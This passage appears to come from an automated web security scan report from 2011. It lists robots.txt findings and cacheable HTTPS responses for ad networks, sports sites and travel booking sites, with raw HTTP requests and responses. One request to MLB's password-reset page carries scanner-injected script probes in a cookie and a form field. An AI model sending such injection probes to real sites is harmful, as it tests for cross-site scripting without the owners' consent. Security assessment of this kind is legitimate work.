GET /robots.txt HTTP/1.0
Host: openx.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 02 Oct 2011 23:52:30 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

25.26. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://panel.kantarmedia.com
Path:   /0/KantarMedia-Panel/panel/set_panel.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: panel.kantarmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "ff614-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

25.27. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 03 Oct 2011 23:48:53 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: QS

User-agent: *
Disallow: /

25.28. http://premiumtv.122.2o7.net/b/ss/premiumtvpremierleague/1/H.2-pdv-2/s98395569906570

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtvpremierleague/1/H.2-pdv-2/s98395569906570

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:17 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "29d113-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www90
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

25.29. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:37 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

25.30. http://resource.guim.co.uk/books/gubookshop/thumbnail/images.bertrams.com/ProductImages/services/GetImage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resource.guim.co.uk
Path:   /books/gubookshop/thumbnail/images.bertrams.com/ProductImages/services/GetImage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: resource.guim.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 May 2011 08:35:57 GMT
Server: Apache
X-GU-httpd: 05
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: public, max-age=911579
Expires: Thu, 13 Oct 2011 13:03:56 GMT
Date: Sun, 02 Oct 2011 23:50:57 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

25.31. http://s0.2mdn.net/2502400/LloydsTSB_PIA_Direct_728x90.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2502400/LloydsTSB_PIA_Direct_728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 02 Oct 2011 22:51:28 GMT
Expires: Mon, 03 Oct 2011 22:51:28 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 3670

User-agent: *
Disallow: /

25.32. http://safebrowsing.clients.google.com/safebrowsing/gethash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 30 Sep 2011 20:43:32 GMT
Date: Sun, 02 Oct 2011 23:49:44 GMT
Expires: Sun, 02 Oct 2011 23:49:44 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Allow: /catalogs/about
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /
...[SNIP]...

25.33. https://secure.mlb.com/resetPassword.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.mlb.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:23 GMT
Server: Sun-ONE-Web-Server/6.1
Last-Modified: Wed, 15 Mar 2006 17:08:42 GMT
ETag: "1a-a0b33a80"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=10
Expires: Sun, 02 Oct 2011 23:48:33 GMT
Keep-Alive: timeout=120, max=861
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

25.34. http://servedby.flashtalking.com/imp/1/16628

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 02 Oct 2011 23:53:29 GMT
Server: Jetty(6.1.22)
Content-Type: text/plain
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 78

# Do not crawl
User-agent: *
Disallow: /


25.35. http://speed.pointroll.com/PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:49:49 GMT
Connection: close

User-agent: *
Disallow: /

25.36. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca0 3232
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

25.37. http://tag.admeld.com/id

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /id

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Fri, 30 Sep 2011 18:23:44 GMT
ETag: "6af024c-1a-4ae2cb9b0ac00"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:49:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

User-agent: *
Disallow: /

25.38. http://www.goal.com/en/teams/england/97/man-utd-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/teams/england/97/man-utd-news

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goal.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 02 Oct 2011 23:52:00 GMT
Last-Modified: Mon, 29 Aug 2011 14:32:11 GMT
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 59
Connection: close

User-agent: *
Allow: /
Sitemap: http://www.goal.com/sitemap

25.39. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 23 Sep 2011 00:58:54 GMT
Date: Sun, 02 Oct 2011 23:48:55 GMT
Expires: Sun, 02 Oct 2011 23:48:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 57
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

25.40. http://www.guardian.co.uk/football/manchester-united

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/manchester-united

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:56 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 10:57:16 GMT
Accept-Ranges: bytes
Content-Length: 1909
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

##ACAP version=1.0

# Conventional policies...
User-agent: *
Disallow: /sendarticle/
Disallow: /Users/
Disallow: /users/
Disallow: /*/print$
Disallow: /email/
Disallow: /contactus/
Disallow: /share/
D
...[SNIP]...

25.41. http://www.luminate.com/widget/v3/53d1ac1014/config/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/53d1ac1014/config/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.luminate.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 02:32:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: text/plain
Cache-Control: s-maxage=86400, max-age=86400
Vary: Accept-Encoding
Age: 76819
Content-Length: 304
X-Cache: HIT from lb3-sv.int.pixazza.com
X-Cache-Lookup: HIT from lb3-sv.int.pixazza.com:80
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive


User-agent: *
Disallow: /activate/
Disallow: /ad-click/
Disallow: /ad-impression/
Disallow: /addwishlist/
Disallow: /ajax/
Disallow: /click/
Disallow: /deactivate/
Disallow: /hide/
Disallow: /show/

...[SNIP]...

25.42. http://www.manutd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manutd.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 57068
Cache-Control: private, max-age=481974
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close

Sitemap: http://www.manutd.com/sitemap.xml


User-agent: *
Disallow: /Live-Webchat/Endava-Test.aspx
Disallow: /Live-Webchat/Gemma-Test.aspx
Disallow: /Live-Webchat/Jens-Test.aspx
Disallow: /Liv
...[SNIP]...

25.43. http://www.premierleague.com/page/Home/0,,12306,00.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Home/0,,12306,00.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.premierleague.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/plain
Cache-Control: max-age=600
Date: Sun, 02 Oct 2011 23:48:53 GMT
Content-Length: 216
Connection: close

##
# Default robots.txt file which will be used for all sites that
# do not have their own specific robots.txt file.
#
# Please add robot exclusions below. e.g.
#
# User-agent: Mediapartners-Google*
#
...[SNIP]...

26. Cacheable HTTPS response
There are 8 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


26.1. https://axptravel.americanexpress.com/consumertravel/customlogin.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://axptravel.americanexpress.com
Path:   /consumertravel/customlogin.do

Request

GET /consumertravel/customlogin.do?clientid=ACH-ONLINE&target=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do%3fService%3DAMEX%26leavingDate%3D10%2F04%2F11%26returningDate%3D10%2F07%2F11%26searchMode%3Dcity%26city%3DBoston%2C%2520United%2520States%26cityCountryCode%3D%26hotelName%3D%26adults%3D1%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25EF%25BF%25BDid%26WA4%3D%25EF%25BF%25BDid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot%26SSORequestPath%3D/hotel/HotelCobrand.do HTTP/1.1
Host: axptravel.americanexpress.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-1315530613634607

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:41 GMT
Server: IBM_HTTP_Server
Content-Length: 619
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


<html>
   <head>
       <meta http-equiv="Refresh" content="5; url=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do?Service=AMEX&amp;leavingDate=10/04/11&amp;returningDate=10/07/11&amp;
...[SNIP]...

26.2. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...

26.3. https://secure.mlb.com/resetPassword.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...

26.4. https://www.expedia.com/static/default/default/stubs/adserver.json

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/stubs/adserver.json

Request

GET /static/default/default/stubs/adserver.json HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"51-1317085587388"
Last-Modified: Tue, 27 Sep 2011 01:06:27 GMT
Content-Length: 51
Date: Mon, 03 Oct 2011 01:08:47 GMT
Connection: keep-alive

{ url: 'http://www.tripadvisor.com/HotelLander' }

26.5. https://www.hotelplanner.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /

Request

GET / HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SCREENWIDTH=1920; SCREENHEIGHT=1200; SOURCECODE=Away; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 01:40:50 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Vary: Accept-Encoding
Content-Length: 0


26.6. https://www.hotelplanner.com/Accept/Reserve.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
